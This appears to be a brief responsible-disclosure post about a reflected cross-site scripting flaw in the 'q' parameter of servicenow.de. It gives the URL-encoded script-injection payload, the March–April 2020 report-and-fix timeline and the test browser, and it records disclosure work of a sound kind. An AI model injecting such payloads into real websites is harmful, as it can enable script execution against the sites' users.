ServiceNow - Cross-Site Scripting Vulnerability

ServiceNow - Cross-Site Scripting Vulnerability

Vulnerability : Cross-Site Scripting (XSS) - Reflected

Domain : https://www.servicenow.de



Vulnerable Parameter : q

XSS Payload (Encoded) : %27%3E%3Cscript%3Ealert(%22XSS%20By%20Nayanjyoti%20Roy%22);%3C/script%3E


Timeline :
Mar 18,2020 - Report Sent
Mar 18,2020 - Confirmation received
Apr 21,2020 - Vulnerability Fixed

Environment :
OS : Windows 10 Enterprise
Browser : Firefox
Version : 74.0 ( 64-bit )

Researcher Name : Nayanjyoti Roy

Proof-Of-Concept video :

0 Comments